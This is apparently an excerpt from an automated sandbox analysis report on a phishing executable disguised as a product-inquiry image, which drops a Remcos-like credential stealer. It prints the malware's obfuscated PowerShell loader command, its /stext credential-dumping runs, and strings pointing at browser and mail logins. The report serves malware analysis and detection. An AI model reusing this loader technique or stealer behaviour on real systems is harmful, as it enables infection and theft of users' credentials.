            Source: powershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2557797233.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktd
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.sr
            Source: Hedgiest165.exe, 00000007.00000002.2794092236.0000000000609000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000007.00000002.2794236485.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000007.00000003.2793605160.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: Hedgiest165.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Hedgiest165.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405582
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_0040987A
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004098E2
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_00406DFC
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_00406E9F
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hedgiest165.exe PID: 2472, type: MEMORYSTR

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Image_Product_Inquiry_Request_Villoslada.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00401806 NtdllDefWindowProc_W,7_2_00401806
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004018C0 NtdllDefWindowProc_W,7_2_004018C0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004016FD NtdllDefWindowProc_A,8_2_004016FD
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004017B7 NtdllDefWindowProc_A,8_2_004017B7
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00402CAC NtdllDefWindowProc_A,9_2_00402CAC
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00402D66 NtdllDefWindowProc_A,9_2_00402D66
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,6_2_0040348F
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00406AFA0_2_00406AFA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04EFDFE02_2_04EFDFE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0777C33E2_2_0777C33E
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00406AFA6_2_00406AFA
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044B0407_2_0044B040
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0043610D7_2_0043610D
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004473107_2_00447310
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044A4907_2_0044A490
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040755A7_2_0040755A
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0043C5607_2_0043C560
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044B6107_2_0044B610
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044D6C07_2_0044D6C0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004476F07_2_004476F0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044B8707_2_0044B870
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044081D7_2_0044081D
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004149577_2_00414957
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004079EE7_2_004079EE
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00407AEB7_2_00407AEB
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044AA807_2_0044AA80
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00412AA97_2_00412AA9
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00404B747_2_00404B74
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00404B037_2_00404B03
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044BBD87_2_0044BBD8
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00404BE57_2_00404BE5
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00404C767_2_00404C76
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00415CFE7_2_00415CFE
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00416D727_2_00416D72
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00446D307_2_00446D30
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00446D8B7_2_00446D8B
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00406E8F7_2_00406E8F
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004050388_2_00405038
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0041208C8_2_0041208C
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004050A98_2_004050A9
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0040511A8_2_0040511A
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0043C13A8_2_0043C13A
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004051AB8_2_004051AB
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004493008_2_00449300
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0040D3228_2_0040D322
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0044A4F08_2_0044A4F0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0043A5AB8_2_0043A5AB
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004136318_2_00413631
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004466908_2_00446690
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0044A7308_2_0044A730
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004398D88_2_004398D8
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004498E08_2_004498E0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0044A8868_2_0044A886
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0043DA098_2_0043DA09
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00438D5E8_2_00438D5E
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00449ED08_2_00449ED0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0041FE838_2_0041FE83
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00430F548_2_00430F54
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004050C29_2_004050C2
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004014AB9_2_004014AB
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004051339_2_00405133
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004051A49_2_004051A4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004012469_2_00401246
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_0040CA469_2_0040CA46
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004052359_2_00405235
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004032C89_2_004032C8
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004222D99_2_004222D9
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004016899_2_00401689
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00402F609_2_00402F60
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: String function: 00416760 appears 69 times
            Source: Image_Product_Inquiry_Request_Villoslada.exeStatic PE information: invalid certificate
            Source: Image_Product_Inquiry_Request_Villoslada.exe, 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoldening.exe4 vs Image_Product_Inquiry_Request_Villoslada.exe
            Source: Image_Product_Inquiry_Request_Villoslada.exeBinary or memory string: OriginalFilenameoldening.exe4 vs Image_Product_Inquiry_Request_Villoslada.exe
            Source: Image_Product_Inquiry_Request_Villoslada.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@12/19@1/3
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,7_2_004182CE
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,6_2_0040348F
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,9_2_00410DE1
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404822
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,7_2_00413D4C
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,7_2_0040B58D
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeFile created: C:\Users\user\AppData\Local\extralityJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-CK59IO
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeFile created: C:\Users\user\AppData\Local\Temp\nsl4BF5.tmpJump to behavior
            Source: Image_Product_Inquiry_Request_Villoslada.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000008.00000002.2780476217.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Hedgiest165.exe, 00000006.00000002.3298674234.0000000021C30000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Hedgiest165.exe, 00000007.00000003.2793269696.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000007.00000002.2794431693.00000000021A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeFile read: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
            Source: unknownProcess created: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe "C:\Users\user\AppData\Local\Temp\Hedgiest165.exe"
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\fwvclzunqobhontovwjupvveekchrmo"
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\pybvmrepextuythsmgwvzaqvnquqkxftlb"
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\zsggmk"
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe "C:\Users\user\AppData\Local\Temp\Hedgiest165.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\fwvclzunqobhontovwjupvveekchrmo"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\pybvmrepextuythsmgwvzaqvnquqkxftlb"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\zsggmk"Jump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeSection loaded: textshaping.dllJump to behavior
